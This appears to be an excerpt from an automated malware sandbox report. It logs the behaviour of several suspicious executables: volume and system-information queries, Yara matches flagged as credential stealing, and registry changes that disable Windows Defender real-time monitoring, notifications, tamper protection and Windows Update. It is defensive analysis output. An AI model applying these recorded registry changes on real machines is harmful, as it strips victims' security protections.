Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\ProgramData\jhbbvnx\fbpbh.exe Queries volume information: C:\ProgramData\jhbbvnx\fbpbh.exe VolumeInformation
Source: C:\ProgramData\jhbbvnx\fbpbh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\jhbbvnx\fbpbh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F6D21C GetLocalTime, 8_2_00F6D21C
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F6D27A GetUserNameW, 8_2_00F6D27A
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F4BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 8_2_00F4BB6F
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 8_2_00F142DE
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match File source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 1.2.skotes.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DhqvS8pXj8.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 46.2.483d2fa8a0d53818306efeb32d3.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1741190427.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1715028121.00000000002C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2980025036.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.2475582578.0000000000511000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 63.2.c1336f9f75.exe.a040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.2.c1336f9f75.exe.a040000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.3.c1336f9f75.exe.a040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.3.c1336f9f75.exe.a040000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.3.c1336f9f75.exe.9ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.3.c1336f9f75.exe.9ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.2.c1336f9f75.exe.9ff0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.2.c1336f9f75.exe.9ff0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 76.2.1e8dfbd5c2.exe.3c99550.0.raw.unpack, type: UNPACKEDPE
